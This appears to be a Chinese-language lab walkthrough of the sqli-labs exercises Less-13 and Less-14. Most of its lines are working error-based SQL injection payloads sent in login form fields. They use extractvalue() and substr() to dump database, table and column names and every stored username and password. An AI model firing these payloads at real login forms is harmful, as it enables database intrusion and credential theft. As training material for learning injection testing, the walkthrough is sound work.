Less-13 到 Less-14 是报错注入
不能使用 union()函数,或者没有回显位
Less-13
闭合字符:('$uname') 或 ('$passwd')
判断闭合字符:
uname=username'&passwd=password&Submit=Submit
#报错,提示了 'password') LIMIT 0,1'
uname=username') or 1 #&passwd=password&Submit=Submit
#正确,确定了闭合字符
判断字段数:
uname=username') order by n #&passwd=password&Submit=Submit
#确定字段数为2
判断回显位:
uname=username') union select 1,2 #&passwd=password&Submit=Submit
#发现没有回显位,改用报错注入
查询当前数据库:
uname=username') and extractvalue(1,concat(0x7e,(select database()))) #&passwd=password&Submit=Submit
查询当前数据库的表:
uname=username') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #&passwd=password&Submit=Submit
查询当前表的字段:
uname=username') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #&passwd=password&Submit=Submit
查询数据:
uname=username') and extractvalue(1,concat(0x7e,(select group_concat(username,'@',password) from security.users))) #&passwd=password&Submit=Submit
# extractvalue() 和 updatexml() 最多输出32个位,数据没有输出完,借助 substr()
uname=username') and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #&passwd=password&Submit=Submit
uname=username') and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),62,31))) #&passwd=password&Submit=Submit
...
# 0x7e 占了一位,所以一次只能查询得到31位
Less-14
跟 less-13 一样的注入手法
闭合字符:"$uname" 或 "$passwd"
uname=username" and extractvalue(1,concat(0x7e,(select database()))) #&passwd=password&Submit=Submit
#查询当前数据库
uname=username" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #&passwd=password&Submit=Submit
#查询当前数据库的表
uname=username" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #&passwd=password&Submit=Submit
#查询当前表的字段
uname=username" and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #&passwd=password&Submit=Submit
uname=username" and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #&passwd=password&Submit=Submit
uname=username" and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),62,31))) #&passwd=password&Submit=Submit
...
#查询数据